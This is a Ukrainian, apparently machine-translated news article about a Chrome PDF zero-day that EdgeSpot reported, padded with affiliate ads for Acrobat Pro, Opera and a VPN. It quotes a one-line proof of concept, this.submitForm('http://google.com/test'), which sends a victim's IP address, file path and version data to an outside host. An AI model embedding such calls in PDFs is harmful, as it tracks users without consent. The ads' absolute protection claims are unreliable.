Помилка Chrome дозволяє хакерам збирати дані користувачів за допомогою файлів PDF

How to effectively deal with bots on your site? The best protection against click fraud.
  • EdgeSpot виявив інтригуючу вразливість нульового дня, використовуючи документи PDF у Chrome.
  • Це вразливість може нашкодити вам, збираючи конфіденційні дані на вашому ПК.
  • Дослідіть наш Сторінка Інтернету та хмари для отримання додаткової інформації про інші інструменти та послуги.
  • Якщо ви зацікавлені в браузерах, ми надаємо багато інформації про них у нашому Центр браузерів.
Помилка Chrome дозволяє хакерам збирати дані користувачів із ваших PDF-файлів
Як щодо використання найкращого менеджера документів?
Зробіть усі свої документи доступними та безпечними за допомогою Adobe Acrobat Reader. Цей інструмент управління документами також дозволить вам підписувати електронне повідомлення та створювати офіційні форми, щоб заощадити ваш час на роботі. Отримайте його для свого ПК, і ви зможете:
  • Відкривайте, друкуйте та редагуйте всі PDF-файли та інші типи файлів
  • Простіше заповнювати PDF-форми
  • Зберігайте свої основні документи в зашифрованому вигляді

Отримайте всі програми за спеціальною ціною!

Світове програмне забезпечення для управління документами № 1 зараз має велику ціну, тож поспішайте!

instagram story viewer

Служба виявлення експлоїтів EdgeSpot виявила інтригуючу Chrome нульовий день уразливості, що використовує документи PDF.

Уразливість дозволяє зловмисникам збирати конфіденційні дані за допомогою шкідливих документів PDF, відкритих у Chrome.

Як тільки жертва відкриває відповідні файли PDF у Google Chrome, шкідлива програма починає працювати у фоновому режимі, збираючи дані користувачів.

Далі дані передаються на віддалений сервер, який контролюється хакерами. Можливо, вам цікаво, які дані всмоктують зловмисники, вони націлюють такі дані на ваш ПК:

  • IP-адреса
  • Повний шлях PDF-файлу до системи
  • Версії ОС та Chrome

Остерігайтеся шкідливого програмного забезпечення PDF-файлів

Експерти плямистий що один із двох доменів readnotify [.] com або burpcollaborator [.] net отримував дані.

Вони виявили, що зловмисники використовують this.submitForm () PDF Javascript API для збору конфіденційної інформації користувачів.

Ми протестували його з мінімальним PoC, простим викликом API this.submitForm (‘ http://google.com/test’) змусить Google Chrome надсилати особисті дані на google.com.

Цю помилку Chrome використовували два окремі набори шкідливих файлів PDF, обидва з яких розповсюджувались у жовтні 2017 року та вересні 2018 року, відповідно.

Примітно, що зібрані дані можуть бути використані зловмисниками для точної настройки атак у майбутньому. Звіти показують, що перша партія файлів була скомпільована за допомогою служби відстеження PDF ReadNotify.

Користувачі можуть використовувати службу для відстеження переглядів користувачів. EdgeSpot не повідомляє ніяких подробиць щодо характеру другого набору файлів PDF.

Швидка порада: змініть браузер на Opera

У ці неспокійні часи на нас нападають зловмисне програмне забезпечення, фішинг та трояни на кожному кроці, тому ми повинні бути набагато пильнішими та залишатися захищеними.

Оскільки це проблема, характерна для Chrome, ви можете уникнути цієї загрози та всіх інших за допомогою браузера, орієнтованого на безпеку Опера.

Цей браузер має вбудований блокувальник реклами, який не тільки прибирає такі відволікаючі фактори, але й блокує сценарії аналітики, пікселі відстеження та методи збору ваших даних.

І якщо ви хочете бути абсолютно впевненими, що тримаєтесь подалі від будь-якої небезпеки, відійдіть за вбудований VPN послугу, якою на 100% можна користуватися необмежений час.

Опера

Опера

Opera пропонує ідеальний захист від загроз завдяки вбудованому блокувальнику реклами та послузі VPN безкоштовно!

Отримайте це безкоштовно
Відвідайте веб-сайт

Як я можу бути захищеним від уразливостей PDF?

Завантажте Adobe Acrobat PRO

Adobe Acrobat PRO

Adobe і Chrome добре поєднуються в обробці файлів PDF. Встановивши розширення Adobe для Chrome, ви можете переглядати та обробляти PDF-файли на свій смак, не виходячи з улюбленого браузера.

Незважаючи на надійну структуру, шкідливе програмне забезпечення, приховане у файлах PDF, може не виявитись, якщо ви використовуєте стандартну версію Reader.

Рекомендується професійна версія, щоб гарантувати ваш захист та захистити ваші дані від хакерів.

Хоча це не безкоштовно, ціна, яку ви заплатите, досить мала за безліч додаткових функцій, які вам сподобаються, включаючи посилений захист ваших PDF-файлів.

Також є 7-денна безкоштовна пробна версія, щоб ви могли спробувати весь досвід Pro перед тим, як зробити покупку.

Adobe Acrobat PRO

Adobe Acrobat PRO

Тримайтеся подалі від шкідливих програм, завантаживши Adobe Acrobat PRO. Він має набагато більше можливостей, ніж безкоштовна версія, і захищає ваші дані.

Безкоштовний пробний період
Відвідайте веб-сайт

Якщо ви хочете бути в безпеці під час серфінгу в Інтернеті, вам потрібно буде отримати повністю спеціальний інструмент для захисту вашої мережі. Встановіть приватний доступ до Інтернету зараз і захистити себе. Він захищає ваш ПК від атак під час перегляду веб-сторінок, маскує вашу IP-адресу та блокує весь небажаний доступ.


Служба виявлення експлоїтів EdgeSpot хотіла попередити користувачів Chrome про потенційні ризики, оскільки не очікувалося, що патч буде випущений найближчим часом.

EdgeSpot повідомив Google про вразливість минулого року, і компанія пообіцяла випустити патч наприкінці квітня.

Однак ви можете розглянути можливість використання тимчасового способу вирішення проблеми, переглянувши отримані документи PDF локально, використовуючи інший додаток для читання.

Крім того, ви можете також відкрити свої документи PDF у Chrome, відключивши ваші системи від Інтернету.

Питання що часто задаються

  • Так. Але якщо ви хочете розширити вибір, вивчіть наші найкращі вибори Chromeконфіденційність розширення в це повне керівництво.

  • Ттут багато розширень, які дозволяють PDF-файли обробка. Перевірте з нашого чудовий гід про найкращі розширення PDF для Chrome.

  • Це не так, але ви можете швидко його активувати. Ось наш всебічне керівництво про те, як увімкнути генератор QR-коду в Chrome.

Teachs.ru
Вірус MEMZ: що це таке і як його назавжди видалити

Вірус MEMZ: що це таке і як його назавжди видалитиВірусКібербезпека

Вірус MEMZ, спочатку нешкідливий, може серйозно пошкодити ваш ПК. Таким чином, ви повинні видалити його якомога швидше.Щоб позбутися, ви можете спробувати просту команду в командному рядку Windows....

Читати далі
T-RAT 2.0 - RAT, керований Telegram, остання загроза вірусу

T-RAT 2.0 - RAT, керований Telegram, остання загроза вірусуЗловмисне програмне забезпеченняТроянськийКібербезпека

T-RAT 2.0 - це нова версія небезпечного троянця віддаленого доступу T-RAT.Шкідливим програмним забезпеченням можна дистанційно керувати за допомогою каналу Telegram.Як повідомляється, шкідливе прог...

Читати далі
10 найкращих інструментів для видалення рекламних програм [Список 2021]

10 найкращих інструментів для видалення рекламних програм [Список 2021]Рекламне ПЗАнтивірусКібербезпека

Використовуйте антивірус із інструментом для видалення рекламних програм, якщо хочете, щоб ваш комп’ютер не міг дратувати та зловмисно з’являтися.Чудове рішення від ESET запобігає крадіжці ваших ос...

Читати далі
ig stories viewer